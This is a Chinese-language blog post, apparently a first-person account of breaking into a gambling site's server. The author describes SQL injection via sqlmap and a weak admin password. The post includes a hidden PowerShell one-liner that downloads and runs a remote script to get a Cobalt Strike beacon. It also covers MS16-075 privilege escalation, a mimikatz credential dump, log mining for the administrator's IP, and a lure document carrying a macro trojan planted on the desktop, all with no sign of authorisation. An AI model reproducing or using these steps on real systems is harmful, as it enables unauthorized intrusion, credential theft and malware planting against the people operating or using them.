记一次拿下棋牌服务器的过程

文章来源：台下言书 写完这篇文章后突然感觉好像没啥技术含量~将就看~~ 通过某个不知名的老哥共享的指纹信息，找到了一个棋牌站点 前台页面长这样： 后台页面长这样： 后台登录处，参数userName存在sql注入,判断了下没有waf，先直接丢入sqlmap一把梭 想着先进后台看看后台长啥样，于是跑了下用户的账号密码，然后发现跑出来的密码乱码，网上找了各种如指定编码啥的都不行。（懒得再跑一遍了，卡的一笔，直接截图sqlmap日志） 于是乎想到了一个办法，通过--sql-shell 来获得一个sqlshell，然后直接执行sql语句试试看。 因为我们在前面跑的过程中已经知道了表名，那就直接执行SqlServer的语句来查询试试会不会乱码。 果然可行，没有乱码。 不过...这串md5看起来好眼熟的样子... 啊这...我为啥开局只试了个admin/admin的弱口令....无语 终于看到后台长啥样了~~ 尝试看看能不能拿下服务器权限，服务器是阿里云的。 我这边直接利用之前的注入点获得一个交互式shell看看什么权限。 意料之中，service权限，想个办法提权先。本来是尝试先上传检测程序看看该系统缺失哪些补丁然后找对应的exp进行提权，不过发现该服务器只有一个c盘，且找不到一个可以写的目录。 为了速度快一点且方便一点，我这边直接反弹一个shell到自己的服务器去执行。 又是在笔记中一通乱翻，终于找到了一个办法，那就是利用powershell远程执行ps1脚本。 powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.28.128/evil.txt'))" 先上一个cs再说，用cs生成一个powershell的payload去执行了一下。 然后郁闷的时候出现了，我的hfs中有下载，但是对方的服务器没有回连上线。 tasklist看了下也没有powershell进程，估计是失败了？ 这个是昨天晚上弄得，由于第二天要起得很早，所以就没有再继续了。 但是，当我今天打开我的cs客户端的时候，发现... 因为当时没上线，所以多执行了几次.. 看了眼cs日志，发现是大半夜了才上线的 emmm..好吧，看来昨晚是他们服务器卡了... 现在还是service权限，但是处境比之前好多了，看了下服务器的类型和补丁后，直接怼exp。我这里用的是ms16-075。 ok，system权限了。用mimikatz抓一下管理员的hash 看了下管理员现在没在线 登上去看看先~（卡的一笔） 看看能不能找出点棋牌运营者的信息出来。 看桌面上有个百度网盘，点开后发现没有登录信息~~ 直接查看系统日志，筛选登录日志，由于有可能不是一个人在登录（可能哪位大黑阔早就进去了也说不定）或者是管理员在不同地方登录或者是挂了代理登录...... 于是把日志先全部导出到本地，然后提取所有登录ip，再取出ip次数最多的那个，大概率就是管理员的ip了。 由于家庭宽带的ip基本上是动态的，但是地理位置都是接近的，根据地理位置最多的来判断。 想尝试能不能拿到更多管理员的信息，于是制作了一个office宏木马 因为要手动点击启用宏，所以内容稍微诱导下 然后插入宏代码，并保存为可执行宏的word文档。 最后放到服务器桌面显眼的地方...